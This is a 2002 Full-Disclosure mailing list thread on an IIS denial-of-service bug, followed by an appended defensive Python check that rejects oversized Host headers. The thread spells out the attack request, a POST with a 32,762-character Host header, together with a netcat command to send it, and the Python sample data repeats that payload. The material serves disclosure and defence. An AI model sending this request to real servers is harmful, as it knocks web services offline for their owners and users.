Re: [Full-Disclosure] How to reproduce the IIS Host Header DOS

From: Full Disclosure (full-disclosureat_private)
Date: Sat Oct 12 2002 - 12:55:51 PDT


    Heh. I thought my screenshot DID show exactly how to reproduce the bug:
    You run SPIKE! :> You can download SPIKE 2.7 at
    http://www.immunitysec.com/spike.html - it's the exact version I used in
    the demonstration screenshot.
    
    You should read my actual commentary on the bug. The bug is actually IIS
    servicing a stack overflow exception, and is not limited to
    /_vti_bin/shtml.dll or any other particular file or directory. It also
    affects IIS 5.1. It's not limited to the Host: field, as far as I can
    tell. Any "stack overflow" exception will trigger this behavior.
    
    
    Dave Aitel
    Immunity, Inc.
    
    
    
    
    On Fri, 2002-10-11 at 19:26, Joe Testa wrote:
    > -----BEGIN PGP SIGNED MESSAGE-----
    > Hash: SHA1
    > 
    > 
    > 
    > - From the screenshots and descriptions given in
    > <http://online.securityfocus.com/bid/5907>, it's not clear *exactly* how to
    > reproduce the IIS Host header DoS.
    > 
    > A POST request like the following (between the [begin] and [end] lines)
    > will manually reproduce the IIS DoS condition:
    > 
    > 
    > - -------------------------[begin]--------------------------------------
    > POST /_vti_bin/shtml.dll HTTP/1.0
    > Host: [32762 '/' characters]
    > Content-length:      22
    > 
    > 
    > http://www.rapid7.com/
    > - --------------------------[end]---------------------------------------
    > 
    > 
    > This will cause the web service to consume 99% of the CPU for about 35
    > seconds.  During this time, no other HTTP requests will be serviced.
    > Attached to this email is the complete string to facilitate testing.
    > Use it with:
    > 
    > $ nc x.x.x.x 80 < iis_dos
    > 
    > 
    >    - Joe Testa, Rapid 7, Inc.
    >    http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x02B00839
    >    A145 B158 2CA7 00A2 BAE8  4A18 57E5 18E0 02B0 0839
    > 
    > -----BEGIN PGP SIGNATURE-----
    > Version: GnuPG v1.0.7 (Cygwin32)
    > 
    > iD8DBQE9p1w3V+UY4AKwCDkRAjHQAJ0Vx5c1rJvDY5+n2595Wq6NQbqwOACeNBBO
    > GcA6qrjAE1Tj+Jqx3kE9U4Q=
    > =RkVz
    > -----END PGP SIGNATURE-----
    > 
    > (See attached file: iis_dos)
    
    
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
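    The thread above describes a request whose Host header is tens of
    thousands of characters long. The following Python snippet is an added
    example, not code from either poster, showing the kind of sanity check a
    reverse proxy, WAF or log analyser can apply in front of a server that
    mishandles oversized headers: parse the raw request, reject a Host value
    longer than a sane bound, and reject one that is not a plausible hostname
    at all. The 260-character limit, the function names and the sample
    requests are assumptions constructed for this example.

```python
import re
from typing import Optional, Tuple, Dict

# A DNS name is at most 253 characters; allow a few more for ":port".
# This limit is an assumption for the example, not a value from the thread.
MAX_HOST_LEN = 260

# Plausible Host values: a DNS-style name or a bracketed IPv6 literal, optional port.
_HOST_RE = re.compile(r"(\[[0-9A-Fa-f:.]+\]|[A-Za-z0-9.-]+)(:\d{1,5})?")


def parse_headers(raw: bytes) -> Tuple[str, Dict[str, str]]:
    """Split a raw HTTP/1.x request into its request line and a lowercase-keyed header dict.

    Both CRLF and bare LF line endings are accepted, since hand-built requests
    (such as one piped in with netcat) often use bare LF.
    """
    head, _, _body = raw.replace(b"\r\n", b"\n").partition(b"\n\n")
    lines = head.split(b"\n")
    request_line = lines[0].decode("latin-1")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if not sep:
            continue  # not a header line; ignore
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return request_line, headers


def check_host_header(raw: bytes, limit: int = MAX_HOST_LEN) -> Optional[str]:
    """Return None if the Host header is acceptable, else a reason string for a log line."""
    request_line, headers = parse_headers(raw)
    host = headers.get("host")
    if host is None:
        return None  # HTTP/1.0 clients may legitimately omit Host
    if len(host) > limit:
        return f"host header too long ({len(host)} > {limit}) on {request_line}"
    if not _HOST_RE.fullmatch(host):
        return f"host header contains unexpected characters on {request_line}"
    return None


# Constructed sample requests for demonstration.
BENIGN = (
    b"GET /index.html HTTP/1.0\r\n"
    b"Host: www.example.com:80\r\n"
    b"\r\n"
)
OVERSIZED = (
    b"POST /_vti_bin/shtml.dll HTTP/1.0\r\n"
    b"Host: " + b"/" * 32762 + b"\r\n"
    b"Content-length: 22\r\n"
    b"\r\n"
    b"http://www.rapid7.com/"
)
BAD_CHARS = b"GET / HTTP/1.0\nHost: ///\n\n"

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("oversized", OVERSIZED), ("bad-chars", BAD_CHARS)):
        print(label, "->", check_host_header(req) or "ok")
```

    The check is deliberately cheap: it runs before the request reaches the
    origin server, so a header that would otherwise cost the backend 35
    seconds of CPU is dropped in microseconds, and the returned reason string
    can be written straight to a log for alerting.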
    


